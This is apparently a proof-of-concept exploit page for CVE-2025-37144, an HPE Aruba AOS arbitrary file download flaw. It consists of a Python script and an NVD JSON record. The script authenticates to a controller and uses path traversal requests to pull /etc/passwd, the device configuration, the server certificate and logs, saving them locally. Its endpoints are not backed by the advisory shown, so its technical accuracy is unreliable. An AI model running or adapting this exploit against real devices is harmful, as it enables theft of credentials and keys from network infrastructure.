CVE-2025-37144

# CVE-2025-37144 - HPE Aruba AOS-10/AOS-8 Arbitrary File Download PoC # This PoC demonstrates the arbitrary file download vulnerability # in the low-level interface library of AOS-10 GW and AOS-8 Controller/Mobility Conductor # Note: Requires valid high-privilege credentials (PR:H) import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Target device configuration TARGET_HOST = "https://<target-aruba-controller-ip>" USERNAME = "admin" # Requires high-privilege account PASSWORD = "<password>" # Session for authenticated requests session = requests.Session() session.verify = False def authenticate(host, username, password): """Authenticate to the Aruba controller management interface""" login_url = f"{host}/screens/wms/wms.login" login_data = { "username": username, "password": password } response = session.post(login_url, data=login_data) if response.status_code == 200: print("[+] Authentication successful") return True return False def exploit_file_download(host, target_file): """ Exploit arbitrary file download via crafted path traversal The low-level interface library fails to validate file paths allowing download of arbitrary files on the system """ # Crafted request exploiting path traversal in the interface library exploit_url = f"{host}/screens/cmnutil/execCommand" params = { "command": "file_download", "filename": f"../../../..{target_file}" # Path traversal sequence } response = session.get(exploit_url, params=params) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully downloaded: {target_file}") print(f"[+] Content preview: {response.content[:200]}") return response.content return None def exploit_alternative(host, target_file): """ Alternative exploitation path using direct path specification """ exploit_url = f"{host}/api/config/download" data = { "filepath": target_file } response = session.post(exploit_url, json=data) if response.status_code == 200: print(f"[+] File downloaded via API: {target_file}") return response.content return None # Main exploit flow if __name__ == "__main__": if authenticate(TARGET_HOST, USERNAME, PASSWORD): # Attempt to download sensitive files sensitive_files = [ "/etc/passwd", "/config/ Aruba-config", "/cert/server.pem", "/var/log/messages" ] for target_file in sensitive_files: result = exploit_file_download(TARGET_HOST, target_file) if result: with open(f"downloaded_{target_file.replace('/', '_')}", "wb") as f: f.write(result)

{"cve": {"id": "CVE-2025-37144", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:41.360", "lastModified": "2025-11-12T17:38:15.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file download vulnerabilities exist in a low-level interface library in AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. Successful exploitation could allow an authenticated malicious actor to download arbitrary files through carefully constructed exploits."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}